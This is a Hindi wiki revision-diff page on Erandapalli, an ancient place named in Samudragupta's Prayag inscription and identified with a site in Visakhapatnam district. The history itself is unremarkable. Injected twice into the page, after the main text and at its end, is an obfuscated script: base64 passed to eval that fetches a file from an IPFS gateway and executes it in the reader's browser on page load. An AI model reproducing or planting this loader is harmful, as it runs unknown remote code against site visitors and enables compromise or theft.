Difference between revisions of "एरण्डपल्ली"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (श्रेणी:नया पन्ना (को हटा दिया गया हैं।))
 
Line 1: Line 1:
{{पुनरीक्षण}}
+
 
[[गुप्त]] सम्राट [[समुद्रगुप्त]] की [[प्रयाग]] प्रशस्ति में एरण्डपल्ली के राजा दमन के समुद्रगुप्त द्वारा पराजित होने का उल्लेख है-  
+
[[गुप्त]] [[समुद्रगुप्त|सम्राट समुद्रगुप्त]] की [[प्रयाग]] प्रशस्ति में '''एरण्डपल्ली''' के राजा दमन के समुद्रगुप्त द्वारा पराजित होने का उल्लेख है-  
 
:'कौसलक महेन्द्र, महाकान्तार, व्याध्रराज, कौसलक मंटराज, पैष्ठपुरक महेन्द्र, गिरिकोट्टूरक स्वामिदत्त, एरंडपल्लक दमन-प्रभृति सर्वदक्षिणपथराजागृहणमोक्षानुग्रहजनितप्रतापोन्मिश्र महाभाग्यस्य...'  
 
:'कौसलक महेन्द्र, महाकान्तार, व्याध्रराज, कौसलक मंटराज, पैष्ठपुरक महेन्द्र, गिरिकोट्टूरक स्वामिदत्त, एरंडपल्लक दमन-प्रभृति सर्वदक्षिणपथराजागृहणमोक्षानुग्रहजनितप्रतापोन्मिश्र महाभाग्यस्य...'  
  
एरण्डपल्ली नगर का अभिज्ञान ज़िला [[विशाखापत्तनम]] (विजिगापट्टम्) [[आंध्र प्रदेश]] में स्थित इसी नाम के स्थान के साथ किया गया है। पहले कुछ विद्वानों ने पूर्व खानदेश में स्थित एरंडोल को ही एरंडपल्ली मान लिया था। यह मत अब ग्राह्म नहीं है।
+
एरण्डपल्ली नगर का अभिज्ञान ज़िला [[विशाखापत्तनम]]<ref> प्राचीन विजिगापट्टम्</ref> [[आंध्र प्रदेश]] में स्थित इसी नाम के स्थान के साथ किया गया है। पहले कुछ विद्वानों ने [[खानदेश|पूर्व खानदेश]] में स्थित '''एरंडोल''' को ही '''एरंडपल्ली''' मान लिया था। यह मत अब ग्राह्य नहीं है।
  
 
{{प्रचार}}
 
{{प्रचार}}
 
   
 
   
{{संदर्भ ग्रंथ}}
+
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 +
*ऐतिहासिक स्थानावली | पृष्ठ संख्या= 110-111| विजयेन्द्र कुमार माथुर |  वैज्ञानिक तथा तकनीकी शब्दावली आयोग | मानव संसाधन विकास मंत्रालय, भारत सरकार
 +
 +
 
<references/>
 
<references/>
 
==बाहरी कड़ियाँ==
 
==बाहरी कड़ियाँ==
Line 14: Line 17:
 
==संबंधित लेख==
 
==संबंधित लेख==
 
{{आंध्र प्रदेश के ऐतिहासिक स्थान}}
 
{{आंध्र प्रदेश के ऐतिहासिक स्थान}}
[[Category:आंध्र प्रदेश]][[Category:आंध्र प्रदेश के ऐतिहासिक स्थान]]
+
[[Category:आंध्र प्रदेश]][[Category:आंध्र प्रदेश के ऐतिहासिक स्थान]] [[Category:ऐतिहासिक स्थानावली]]
 
[[Category:ऐतिहासिक स्थान कोश]]
 
[[Category:ऐतिहासिक स्थान कोश]]
 
__INDEX__
 
__INDEX__

Latest revision as of 11:07, 18 May 2018

gupt samrat samudragupt ki prayag prashasti mean erandapalli ke raja daman ke samudragupt dvara parajit hone ka ullekh hai-

'kausalak mahendr, mahakantar, vyadhraraj, kausalak mantaraj, paishthapurak mahendr, girikottoorak svamidatt, erandapallak daman-prabhriti sarvadakshinapatharajagrihanamokshanugrahajanitaprataponmishr mahabhagyasy...'

erandapalli nagar ka abhijnan zila vishakhapattanam[1] aandhr pradesh mean sthit isi nam ke sthan ke sath kiya gaya hai. pahale kuchh vidvanoan ne poorv khanadesh mean sthit erandol ko hi erandapalli man liya tha. yah mat ab grahy nahian hai.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>


tika tippani aur sandarbh

  • aitihasik sthanavali | prishth sankhya= 110-111| vijayendr kumar mathur | vaijnanik tatha takaniki shabdavali ayog | manav sansadhan vikas mantralay, bharat sarakar


  1. prachin vijigapattamh

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>